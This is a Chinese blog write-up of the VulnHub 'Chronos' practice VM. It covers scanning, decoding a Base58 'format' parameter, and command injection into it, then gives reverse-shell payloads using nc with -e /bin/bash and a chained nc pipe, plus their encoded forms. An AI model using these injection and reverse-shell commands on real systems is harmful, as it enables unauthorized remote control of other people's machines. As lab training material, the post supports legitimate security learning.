VulnHub靶场-Chronos

最新推荐文章于 2023-08-25 22:39:03 发布
最新推荐文章于 2023-08-25 22:39:03 发布
阅读量843 收藏
点赞数
分类专栏: 靶场 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/131155755
版权

目录

0x01 声明:

0x02 简介:

0x03 环境准备:

0x04 信息收集:

1、主机发现

2、NMAP扫描

3、访问业务

4、目录探测

5、查看网页代码

0x05 渗透测试过程:

1、Burp Suite抓包

2、构造payload

测试是否可以外联。

构造反弹shell payload

0x06 提权

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。

0x03 环境准备:

Chronos环境地址:

https://www.vulnhub.com/entry/chronos-1,735/

(提醒!我在这里用vm打开一直有问题,尝试网上各种方法后放弃了用VirtualBox)

0x04 信息收集:

1、主机发现

使用netdiscover工具来进行主机发现

netdiscover -r 192.168.56.0/16

2、NMAP扫描

对靶机进行操作系统、开放端口、运行的服务进行探测

nmap -sT -O -sV -p- 192.168.56.101

存在22对应SSH服务 80 8000对应http服务80端口对应 Apache服务,8000端口Node.js的Express框架搭建的http服务。

3、访问业务

访问80和8000端口对应业务

4、目录探测

对80端口进行目录探测,看看是否有可用路径。(并无可用路径)

5、查看网页代码

(发现有个奇怪的代码)

http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

(请求chronos.local的8000端口服务,之前我们在信息收集的时候正好有一个8000端口无法访问。)

修改host值

Linux:vim /etc/hosts

Windows:C:\Windows\System32\drivers\etc\hosts

(这个地方就比较奇怪了。后面我换了其他浏览器发现只有火狐行,应该是在UA处做了限制。)

0x05 渗透测试过程:

1、Burp Suite抓包

发现在format后有串类似Base64的字符使用“厨师“进行解密

哈哈发现并不是Base 64而是 Base58

用Kali执行:

Date‘+Today is %A, %B %d, %Y %H:%M:%S.'

2、构造payload

由上面分析可以发现,写入系统的数据应该是format后Base58传入后端。

构造恶意命令:

可以看到服务器回显成功。

测试是否可以外联。

利用telnet测试

可以看到靶机是可以外联成功的。

构造反弹shell payload

正常构造payload发现反弹失败。

&& nc 192.168.56.101 9999 -e /bin/bash

Base58

6eK5JFNT7CahVhdM6iDKHY4Q4b6xZA3b9SYoVitYyFvcX7T9pvQf

反弹失败,那么nc的版本可能过老,没有-e参数,下面我们用NC串联试试反弹

&& nc 192.168.56.102 8888 | /bin/bash | nc 192.168.56.102 9999

Base58

3Gho48Ayo8ZTkKBJiuZV9GykBLVZ7MCmLfYpf4xX8EYj5JPGL2eQFsFN2w6Aw4qR1mM3KNKmH17vabcdehnqv

反弹成功。

0x06 提权

后面有空在继续学习补充上来吧。

Evan Kang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub之Chronos:1 靶机实验
weixin_64112307的博客
06-30 950
EJS-RCE
vulnhub靶场-Chronos
qq_42947816的博客
05-10 826
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub chronos
weixin_46107179的博客
04-06 4367
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
Vulnhub靶机--Chronos
Tauil的博客
08-05 576
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
Vulnhub系列--CHRONOS: 1
ch3cke的博客
03-31 4213
本次渗透测试我将使用cs来辅助进行渗透: 打点 主机存活发现: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.56.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or spec.
node-red-contrib-chronos:基于时间的Node-RED调度,排队,路由,过滤和操作节点
04-29
节点红色贡献时间 Node-RED节点的集合,用于基于日期和时间的调度,排队,路由,过滤和操作。 还支持自动计算太阳事件(日出,日落,黄昏,黎明等)或月亮事件(月出,月落)的时间。 如果您遇到错误,想提出一个新...
auth-system-chronos:使用德州仪器 (TI) 的 eZ430-Chronos 手表和 CC1111 的接近身份验证系统
06-28
使用 eZ430-Chronos 和 CC1111 进行近距离身份验证。 使用 eZ430-Chronos 手表的近距离身份验证系统。涉及要素 Client: eZ430-ChronosAP: CC1111 + PCServer: PC在职的我们制定了一个协议来在 eZ430-Chronos 和 CC...
Laravel开发-chronos
08-28
Laravel开发-chronos Laravel雄辩模型的活动日志
eZ430-Chronos_Software.rar_ez430_chronos
09-24
ez430-chronos 手表的软件功能描述
Laravel开发-laravel-chronos
08-28
Laravel开发-laravel-chronos 将碳\碳替换为蛋糕\计时\计时
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3088
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
VulnHub-Chronos: 1
最新发布
weixin_44249502的博客
08-25 220
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
vulhub靶场之chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 383
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
VulnHub靶场】——CHRONOS: 1
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
Chronos靶机打靶过程(利用express-fileupload)
捣蛋鬼
03-27 3811
难度:中(构思巧妙) 目标:取得2个flag+root权限 涉及攻击方法: 端口扫描 WEB侦察 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 0x01 sudo netdiscover -r 10.0.2.0/16 #主机发现 sudo nmap -p- 10.0.2.6 #扫描全端口 sudo nmap -p22,80,8000 -sV 10.0.2.6 #扫描端口所开启的服务 0x02 访问80端口并查看页面源码 在script标签里发现一段脚本 v
Chronos靶机打靶过程与思路
qq_52610024的博客
04-06 3364
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
打靶第三周-chronos
wcwdnmdnmd的博客
12-05 837
打靶第三周-chronos
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 536
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 1万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Capacity mismatch for disk D:\镜像\Vulnhub\Chronos\\Chronos-disk1
07-22
感谢您提供的更多细节。根据您提供的信息,磁盘D的容量不匹配可能是由于镜像文件或文件夹的大小与实际磁盘容量不一致引起的。您可以尝试以下解决方案来解决这个问题: 1. 检查文件大小:首先确认您的镜像文件或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值